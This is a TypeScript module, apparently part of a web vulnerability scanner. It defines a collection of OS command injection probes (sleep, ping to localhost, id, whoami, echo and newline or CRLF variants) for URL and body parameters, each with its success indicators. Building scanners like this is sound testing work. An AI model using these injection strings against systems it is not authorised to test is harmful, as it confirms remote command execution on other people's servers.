import { Payload, PayloadSet, generatePayloadId } from "./payload-types";

const blindPayloads: Payload[] = [
  {
    id: generatePayloadId("command_injection", "blind", 1),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: ";sleep 5",
    description: "Unix sleep command for time-based detection",
    expectedBehavior: "Response delayed by approximately 5 seconds",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 2),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "|sleep 5",
    description: "Pipe to sleep command",
    expectedBehavior: "Response delayed by approximately 5 seconds",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 3),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "$(sleep 5)",
    description: "Command substitution with sleep",
    expectedBehavior: "Response delayed by approximately 5 seconds",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 4),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "`sleep 5`",
    description: "Backtick command substitution",
    expectedBehavior: "Response delayed by approximately 5 seconds",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 5),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "& ping -c 5 127.0.0.1 &",
    description: "Background ping command for delay",
    expectedBehavior: "Response delayed due to ping",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 6),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "| ping -n 5 127.0.0.1",
    description: "Windows ping command",
    expectedBehavior: "Response delayed due to ping",
    successIndicators: [],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

const errorBasedPayloads: Payload[] = [
  {
    id: generatePayloadId("command_injection", "error_based", 1),
    category: "command_injection",
    technique: "error_based",
    riskLevel: "safe",
    value: ";id",
    description: "Semicolon with id command",
    expectedBehavior: "User/group information in response",
    successIndicators: [
      "uid=",
      "gid=",
      "groups=",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "error_based", 2),
    category: "command_injection",
    technique: "error_based",
    riskLevel: "safe",
    value: "|id",
    description: "Pipe to id command",
    expectedBehavior: "User/group information in response",
    successIndicators: [
      "uid=",
      "gid=",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "error_based", 3),
    category: "command_injection",
    technique: "error_based",
    riskLevel: "safe",
    value: "& whoami",
    description: "Ampersand with whoami",
    expectedBehavior: "Username in response",
    successIndicators: [
      "root",
      "www-data",
      "apache",
      "nginx",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "error_based", 4),
    category: "command_injection",
    technique: "error_based",
    riskLevel: "safe",
    value: "$(whoami)",
    description: "Command substitution with whoami",
    expectedBehavior: "Username in response",
    successIndicators: [
      "root",
      "www-data",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "error_based", 5),
    category: "command_injection",
    technique: "error_based",
    riskLevel: "safe",
    value: "| echo VULNERABLE",
    description: "Echo marker for detection",
    expectedBehavior: "VULNERABLE string in response",
    successIndicators: [
      "VULNERABLE",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

const newlinePayloads: Payload[] = [
  {
    id: generatePayloadId("command_injection", "blind", 10),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "\nid",
    description: "Newline command injection",
    expectedBehavior: "Command executed after newline",
    successIndicators: [
      "uid=",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
  {
    id: generatePayloadId("command_injection", "blind", 11),
    category: "command_injection",
    technique: "blind",
    riskLevel: "safe",
    value: "\r\nid",
    description: "CRLF command injection",
    expectedBehavior: "Command executed after CRLF",
    successIndicators: [
      "uid=",
    ],
    failureIndicators: [],
    applicableContexts: ["url_param", "body_param"],
    encoding: "none",
  },
];

export const commandInjectionPayloadSet: PayloadSet = {
  category: "command_injection",
  name: "Command Injection Payloads",
  description: "OS command injection payloads for Unix and Windows systems",
  payloads: [
    ...blindPayloads,
    ...errorBasedPayloads,
    ...newlinePayloads,
  ],
};

export function getCommandInjectionPayloads(technique?: string): Payload[] {
  if (!technique) return commandInjectionPayloadSet.payloads;
  return commandInjectionPayloadSet.payloads.filter(p => p.technique === technique);
}
